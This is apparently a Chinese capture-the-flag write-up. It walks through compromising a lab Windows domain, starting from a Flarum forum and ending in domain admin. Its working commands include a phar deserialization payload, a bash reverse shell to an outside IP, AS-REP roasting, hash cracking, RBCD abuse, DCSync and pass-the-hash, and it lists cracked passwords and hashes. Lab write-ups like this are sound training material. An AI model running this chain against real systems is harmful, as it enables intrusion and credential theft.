訪問發現是個Flarum CMS框架.
使用rockyou.txt爆破administrator得到密碼1chris,登入後臺
由於題目提示Flarum上執行任意命令,搜到了P牛的文章
照著打反序列化.
執行命令
./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/123.57.23.40/1111 0>&1'"
生成tar格式的phar檔案包
將得到的base64替換
@import (inline) 'data:text/css;base64,xxx';
中的xxx
然後複製到後臺修改css處
並儲存.然後訪問主頁確保css成功重新整理.再次重新修改css,對我們的phar進行檔案包含.
.test {
content: data-uri('phar://./assets/forum.css');
}
點選儲存會卡一會,然後成功彈shell
發現沒有root資料夾檢視許可權,
沒法suid提權,這裡需要使用capability提權
getcap -r / 2>/dev/null
這裡的openssl可以提權
openssl enc -in "/root/flag/flag01.txt"
得到第一個flag: flag{2f62c0ea-121e-40f2-ba75-9c8368a2a89a}
傳個代理,傳個fscan去掃描
172.22.60.8:139 open
172.22.60.42:135 open
172.22.60.15:135 open
172.22.60.8:135 open
172.22.60.52:80 open
172.22.60.52:22 open
172.22.60.42:445 open
172.22.60.15:445 open
172.22.60.8:445 open
172.22.60.42:139 open
172.22.60.15:139 open
172.22.60.8:88 open
[*] NetInfo:
[*]172.22.60.42
[->]Fileserver
[->]172.22.60.42
[->]169.254.83.27
[*] NetInfo:
[*]172.22.60.8
[->]DC
[->]172.22.60.8
[->]169.254.42.35
[*] NetBios: 172.22.60.8 [+]DC XIAORANG\DC
[*] NetBios: 172.22.60.15 XIAORANG\PC1
[*] NetInfo:
[*]172.22.60.15
[->]PC1
[->]172.22.60.15
[->]169.254.178.145
[*] NetBios: 172.22.60.42 XIAORANG\FILESERVER
[*] WebTitle: http://172.22.60.52 code:200 len:5867 title:霄壤社群
之前登入後臺的時候看到了一堆使用者和郵箱.
然而不是很方便去導下來.我們登入後臺資料庫去處理.
檢視config檔案獲取資料庫登入的賬號和密碼.
使用nvcat登陸將指定列匯出(我蟻劍,nvcat啥的都沒成功,手動一點一點打的)
打一個AS-REQ Roasting
proxychains impacket-GetNPUsers -dc-ip 172.22.60.8 xiaorang.lab/ -usersfile flarum_users.txt
得到
$krb5asrep$23$wangyun@XIAORANG.LAB:7113eff57f6a311ae31c6954239295c4$6d61457220f4a148bdb66b2eb60186c19fb59036b11408b4a16030a55f2e578917decac987e4bef1e5b758211a8a6657d7dcd7497a4f9f8d8574f19080146e794982c7dc0b9b86510cadc4c3ff84a7afef6fd51000c46cba3868799e5fe89a824acb90903b5e5a5da72503f30a8c9d016f298b2d3686bb75abfc48a7a2d31adc45600d6718c8b8b9712855c5f157c64f163e24fba17b0f926a62821344782e519d392da64129562cc04d0a098cdfb9d3c0101519c3b6c359467e061672ddde3853fa0101e1d6fa384cb4df313b6b6c4b0c8c8269f54dc9a4f04392ea6ad7c37084f0e3519e827a66f113f86b
$krb5asrep$23$zhangxin@XIAORANG.LAB:6a1df11dffef818977a03d01e7e34240$cc37025841b68c245336912104d4a4f0585c81685912feb5a08fe36e2c38e3ff550cc2902b8d7af2ad2846b4f6e9f785691b06d036c2941003af6eb13317da739a7fbd9779629345134d2d15b641684e477834e24eb9dc1fce6c912d9655813526175a3de0af09d778072cf2be2e7ef1d15e0b57850ebcb2e549d9e1638dde0f5f6809cd880635c759cf5074c238179b5377e5735b01be55b68f3f339eebe4382722d061b070ac328f912b2118efdafa99f81f5a7260ec253bafca4ebacae63e86627a20a2b80e5e1fd326a537d8c5d88a95273584549e47af14b54ee36a3c99244ef1405164903d963e4593
隨便挑一個使用者去爆一下
hashcat -m 18200 --force -a 0 '雜湊' /usr/share/wordlists/rockyou.txt
爆破得到使用者名稱和密碼wangyun@XIAORANG.LAB/Adm12geC
用這個使用者名稱和密碼跑一下bloodhound
proxychains bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp
發現使用者zhangxin是Account Operator,對FileServer 有GenericAll許可權.我們可以去打一個RBCD提權.
首先要有zhangxin的使用者才行.我們先掃一下這個172.22.60.15看看
發現開了3389,rdp上去,發現有個xshell.我們點選提示讓我們更新.這就沒法玩了...
看wp知道要抓xshell的賬號密碼.
傳個SharpXDecrypt去跑一下
成功抓到了zhangxin的密碼admin4qwY38cc
接下來打RBCD,嘗試按照網鼎杯半決賽的打
新增機器賬戶01
proxychains python3 addcomputer.py -method SAMR xiaorang.lab/zhangxin:admin4qwY38cc -computer-name 01\$ -computer-pass Passw0rd -dc-ip 172.22.60.8
傳個powerview.ps1上去抓取機器賬戶sid
Import-Module .\PowerView.ps1
Get-NetComputer 01 -Properties objectsid
sid:S-1-5-21-3535393121-624993632-895678587-1116
修改172.22.60.42(FILESERVER)機器的msDS-AllowedToActOnBehalfOfOtherIdentity
屬性,使其指向01
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3535393121-624993632-895678587-1116)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer FILESERVER | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
偽造一個Administrator的ST
proxychains impacket-getST xiaorang.lab/01\$:Passw0rd -spn cifs/FILESERVER.xiaorang.lab -impersonate administrator -dc-ip 172.22.60.8
匯入票據
export KRB5CCNAME==administrator@cifs_FILESERVER.xiaorang.lab@XIAORANG.LAB.ccache
改hosts,雜湊橫傳登入
proxychains python3 ~/CTFtools/impacket/examples/psexec.py Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8 -codec gbk
成功得到shell
flag:flag{c2385619-1870-4cbe-99d9-5c2a7e3e110d}
此時獲得的是機器的管理員許可權,可以直接DCSync(Bloodhound中有提示可以)
抓一下這個FIlESERVER的雜湊
proxychains python3 secretsdump.py -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8
其中FILESERVER的NTLM是XIAORANG\Fileserver$:aad3b435b51404eeaad3b435b51404ee:951d8a9265dfb652f42e5c8c497d70dc:::
進行DCSync攻擊
proxychains ~/CTFtools/impacket/examples/secretsdump.py xiaorang.lab/'FILESERVER$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator
c3cfdc08527ec4ab6aa3e630e79d349b
就是域控的雜湊
使用雜湊橫傳去拿PC1的雜湊
proxychains crackmapexec smb 172.22.60.15 -u administrator -Hc3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\\Users\Administrator\flag\f*"
flag:flag{4a616538-8131-4d7e-9bd3-2452c232de32}
proxychains crackmapexec smb 172.22.60.8 -u administrator -Hc3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\\Users\Administrator\flag\f*"
flag:flag{48fb52f2-e15d-473d-85b9-4889e1e136f6}